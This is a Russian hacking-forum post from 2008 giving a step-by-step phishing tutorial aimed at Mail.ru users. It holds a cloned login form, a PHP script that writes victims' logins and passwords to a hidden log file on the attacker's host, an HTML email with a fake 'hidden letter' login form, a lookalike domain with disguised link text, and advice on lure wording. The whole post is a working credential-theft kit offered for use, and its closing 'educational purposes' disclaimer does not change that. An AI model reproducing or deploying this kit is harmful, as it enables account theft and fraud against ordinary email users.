1. На проекте открылась регистрация только для продавцов. Для обычных пользователей будет открыта позже. Подробнее.
    P.S. Не надо скидывать ссылки на форумы, где у вас ноль сообщений. Подобные заявки будут отклонятся.
Скрыть объявление
Привет, Незнакомец! У тебя есть возможность Оставить комментарий в теме

Устраиваем фишинг-атаки, на примере @mail.ru

Тема в разделе "H4X S0FTW4RE", создана пользователем TRaY, 25 ноя 2008.

  1. TRaY IPv6

    TRaY
    TS
    WebVoice
    Регистрация:
    8 сен 2008
    Сообщения:
    136
    Симпатии:
    4
    Просили расписать каг делать фейки и каг их рассылать, чтоб достаточно народу повелось на это...В статье описывается пример фишенг-атаки, приготовление фейков\скамов, примеры соц.инженерии, необходимый софт и тп.

    Устраиваем фишинг-атаки. На примере @Mail.ru

    1. Intro.
    Что такое фишинг. Фишинг (англ. phishing, от password — пароль и fishing — рыбная ловля, выуживание) — вид интернет-мошенничества, целью которого является получение доступа к конфиденциальным данным пользователей — логинам, паролям, данным кредитных карт и тп.
    Зачем это нужно. Если не учитывать прямую финансовую выгоду из кражи кред.карт и слива с них денег, то есть еще много целей, на которые можно потратить сфишенные данные...например, кража логинов:паролей почтовых ящиков - минимальное, что мы можем с них получить - пустить под спам\продать спамерам. Если нам нужно что-то посерьезнее, можно написать бота, который будет чекать краженные мыла на предмет писем от нужных нам сайтов, например соц.сетей(vkontakte.ru/odnoklassniki.ru/etc) и вытаскивать логины:пассы, тогда мы уже получаем не только мыла под спам, Но еще и акки под спам\слив голосов\етц...

    2. Немного теории.
    Как правильно организовать фишенг атаку. Не можем же мы рассылать сообщения\письма с тектом типа "эй, придурок, скажи мне свой пасс, мне поспамить надо" и тд, нам нужно что-то завлекающее, то, чему наивный юзер поверит, нам подойдет сервисное сообщение. Но как завлечь пользователя? - не все же сейчас ведуться на "сбой бд" с просьбой подтвердить пароль, поэтому нам нужно как-то завлечь юзверя. Я буду описывать способ завлечения со скрытыми письмами. Представьте, когда юзверь проверяет почту и обнаруживает письмо от admin@mail.ru с содержанием "Здравствуйте, "Владимир Люблю Подрачить"...тра-ля-ля...Вам пришло 2 скрытых письма от пользователя "Светик Вротберунчик", чтобы прочитать скрыте письма вам нужно авторизоваться...бла-бла-бла" и форма ввода логина и пароля...Выглядит заманчиво, текст конечно можно видоизменять и тд, в общем, каждый выберает сам, какой текст ему слать.
    Главное, что следует помнить:
    Старайтесь не выпрашивать пароль на прямую, избегать частых повторений слов "Логин", "пароль" и тд...
    Если вы подкрепляете письмо какими-либо графическими файлами, типа иконок, табличек и тд, старайтесь чтоб по дизайну они подходили к сервису, на котором висит наша "жертва".
    Пишите всегда граматно, старайтесь избегать ошибок, если не получается - используйте ворд\файрфокс\етц - программ, с проверкой арфографии...Врят ли юзверь поверит письму типа "Здрасте, вам пришло песьмеццо"...

    3. Переходим к действиям.
    Что нам потребуется:
    Немного терпения.
    Капелька мозга.
    Текстовый редактор.
    Анонимный мейлер с поддержкой отправки писем в html.

    Чем будем фишить?
    - Фишить мы будем скамами ака фейками. - Поддельными страницами, идентичными оригенальным, но все введенные данные будут записываться в нашу бд и юзацо нами)
    Какие фейки мы будем использовать?
    - т.к. йа буду показывтаь фсе на примере mail.ru, то с-но и фейки будут "под них", создавать будем 2 типа фейков:
    Фейк страници авторизации.
    Фейк внутри письма, как описывалось в п.2.

    И так, преступим, открываем текстовый редактор, рекомендую "Notepad 2", теперь переходим по адресу http://win.mail.ru/cgi-bin/auth , жмем "посмотреть исходный код страници" - зависит от браузера, йа буду показывать на примере оперы. Жмем ctrl+f, вводим в поле поиска "<form" нас переводит на строку:
    HTML:
    <form method="post" action="auth" onSubmit="return CheckForm(this);">
    Меняем на
    HTML:
    <form action=login.php method=post>
    Теперь спускаемся чуть ниже, и находим 3 строки:
    HTML:
    1.<input type="text" name="Login" value="" class=w_100>
    2.<select class=w_100  name="Domain">
    3.<input  type="password" name="Password" class=w_100>
    Теперь выделяем отсюда параметры name и их значения:
    1.Login
    2.Domain
    3.Password
    Сохраняем все как файл html.
    Теперь откроем сохраненный файл...непохоже, верно? Все из-за того, что пути к картинкам\скриптам и тд - относительные, то есть обращение идет к локальному файлу, а нам нужно чтоб обращение было к удаленному файлу. Меняем все пути типа src=/img/img.jpg на
    src="http://mail.ru/img/img.jpg" ...это немного нудно, но зато у нас все будет в одном html-файле, если же вам лень, сохраняем страницу как файл с рисунками\етц, и получаем наш файл.html и папку, с таким же именем, в которой хранятся все нужные файлы.
    ТеперЬ, когда у нас есть готовый html-файл, идентичный оригенальному, можно приступить к обрабоке вводимых данных...
    Пишем в наш открытый текстовый редактор слудующий код:
    PHP:
    <?
    $login $_POST['Login'];
    $dom $_POST['Domain'];
    $pass $_POST['Password'];
    $file "log.txt";
    $fop fopen("$file","a+");
    fwrite("$fop","\n $login:$dom:$pass \n");
    fclose($fop);
    header("Location: http://win.mail.ru");
    ?>
    Сохраняем этот файл как login.php ...
    Теперь закинем наш html-файл и файл login.php в одну дирикторию, там же создадим тектовый файл log.txt.
    Теперь поставим все на хостинг, с поддержкой php и выставим на файл log.txt права 777.
    Теперь зайдем по адресу нашего хтмл-файла и попробуем ввести какую-нить отсебятину, Например логин: adsf пароль: fdsa
    Жмем вход. Теперь открываем наш файл log.txt и видим там записанные данные вида введенный логин:выбранный домен:пароль.
    Убедились что все работает, теперь вродибы можно слать, но мало ли наше письмо попадет такому же вишеру, и он захочет получить собранные нами акаунты на халяву? - теперь нам нужно подумать немного о защите...Для начал, добавим в нашу папку с фейком пустой файл index.html, теперь доступ к дириктории из браузера закрыт.
    Имя log.txt слишком простенькое, и многие наверное именно с него и начнут проверять имя файла бд...поэтому назовем файл как-нибудь типа "adfiaewgnldshga213.txt" и отредактируем следующую строку:
    PHP:
    $file "log.txt";
    меняем на
    PHP:
    $file "adfiaewgnldshga213.txt";
    Сохраним, теперь наш лог имеет сложное название и путь до лога сложновато определить...
    А вот теперь можно составлять текст для рассылки, и подсовывать наш линк на фейк...но есть и здесь загвоздка, как заставить юзверя перейти по линку типа ma1l-ru.com - сложновато, поэтому мы будем отправлять письмо в формате html и напишем примерно следующее:
    Здравствуйте...бла...бла...бла...перейдите по ссылке <a href=http://ma1l-ru.com>Hard-Porno by mail.ru</a>...бла...бла...бла...
    Теперь, человек не видит нашей ссылке, а видит только Hard-Porno by mail.ru и думает, что кликнув по ссылке он попадет на свежезалитую парнуху от админов mail.ru но на самом деле он летит на наш фейковый сайт.
    Вроде все хорошо, но каг же быть с юзверями, которые умнее картофеля? Здесь мы рассмотрим второй пример, более правдоподобный...
    Все остается так же, только наш html-файл нам больше не нужен, заливаем на хост все оставшееся - php-файл, лог и тд...
    Теперь снова открываем наш текстовый редактор и пишем следующий код:
    HTML:
    ////////////////////////////////////////////////////////////////////
     <table class="readlet" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr>
    <td id="aj_body">
    <div id="let_body">
    <table class="readlet" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr>
    <td id="aj_body">
    <font color="#003366" face="Arial">
    <h4>Авторизация</h4>
    </font>
    <table class="login" border="0" cellpadding="0" cellspacing="0">
    <tbody><tr>
    <td>
    <p class="abzac"><img src="http://kartunku.do.am/security.gif">
    </p></td><td>Пользователь отправил вам скрытое письмо.<br> Для просмотра письма введите ваш логин и п<xhtml>ароль . <p></p></xhtml></td>
    </tr>
    </tbody></table>
    <table class="login" border="0" cellpadding="0" cellspacing="0">
    <form action="ПУТЬ ДО ФАЙЛА login.php" method="post">
    <input name="mail" value="1" type="hidden">
    <tbody><tr>
    <td width="75">
    <img src="Pismo_files/0.gif" height="1"><br>Имя:
    </td>
    <td width="150">
    <input name="Lodin" value="" type="text">
    </td>
    <td width="75">
    <select name="Domain">
    <option value="mail.ru" selected="selected">@mail.ru</option>
    <option value="inbox.ru">@inbox.ru</option>
    <option value="list.ru">@list.ru</option>
    <option value="bk.ru">@bk.ru</option>
    </select>
    </td>
    </tr>
    <tr>
    <td>
    П<xhtml>ароль:
    </xhtml></td>     
    <td>
    <input name="Password" type="emai">
    </td>
    <td>
    <a href="http://www.mail.ru/pages/help/92.html" target="_new">Забыли&nbsp;п<xhtml>ароль?</xhtml></a>
    </td>
    </tr>
    <tr>                    
    <td>&nbsp;</td>
    <td>
    <input name="level" value="1" id="alien" type="checkbox"><label for="alien">Чужой компьютер</label>
    </td>
    <td>&nbsp;</td>
    </tr>
    <tr>
    <td>&nbsp;</td>
    <td>
    <input value="Прочитать" xxstyle="margin-top:4px" type="submit">
    </td>
    <td>&nbsp;</td>
    </tr>
    </tbody></table>
    </form>
    \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
    Теперь нам остается только отредактировать параметр action и вписать полный путь, пример action="http://example.ru/login.php"
    Открываем наш мейлер, копируем туда весь код, пишем "от кого" и "кому" тему моно выбрать типа "вам пришло скрытое письмо" и отправляем...теперь ждем пасса, запустите файл у себя в браузере, и вы поймете, что 2ой вариат фейка выглядит убедительнее...
    Разумеется, вы можете видоизменять фейки, добавлять в них различные фичи, менять тексты и тп, тк это просто шаблон.

    4. ФАК.
    Ака часто задаваемые вопросы.

    в. Я залил все на хост, решил проверить, но логина и пароля нету, что делать?
    о. Скорее фсего ты забыл выставить прова на файл базы данных, проверь чтобы права были 777(0777).

    в. Что за код мы вводили в login.php, почему он так работает?
    о. Изучай php и тебе все будет понятно.

    в. Йа отправил письмо, но почему-то он пришло в изначальном виде и хтмл теги не работают, почему?
    о. Скорее всего твой мейлер не поддерживает отправки письм в html.

    в. Где мне взять такой мейлер?
    о. Скачать. Поиск рулед.

    в. Ура, все получилось, все работает, но почему-то мне не пришли логи и пароль жертвы, почему?
    о. Возможно "жертва" не такой идиот чтоб повестись на фейк, жди, если не будет результатов, пробуй другие способы.

    в. А как мне сделать фейк, например, яндекса?!
    о. Точно так же, как и описано в п.3. Параметры везде одинаковы, разве что можно убрать из login.php строку $dom = $_POST['Domain'];

    в. А правдо, что если в письмо можно втавить хтмл теги, то йа смогу это использовать для ксс и айфреймов?
    о. Нет. Теги типа iframe, <script>, etc фильтруются и блокируются системой. Разве что это не почта каких-нить идиотов. На mail.ru не прокатит.

    5. End.
    Теперь, когда вы знаете как устроить фишенг-атаку, вам следует узнать, что все это противозаконно и уголовнонаказуемо, так что статья написана в позновательных целях и любые противоправные действия - приключение на ВАШУ попу(=

    special for Webcriminal =)
     
    1 человеку нравится это.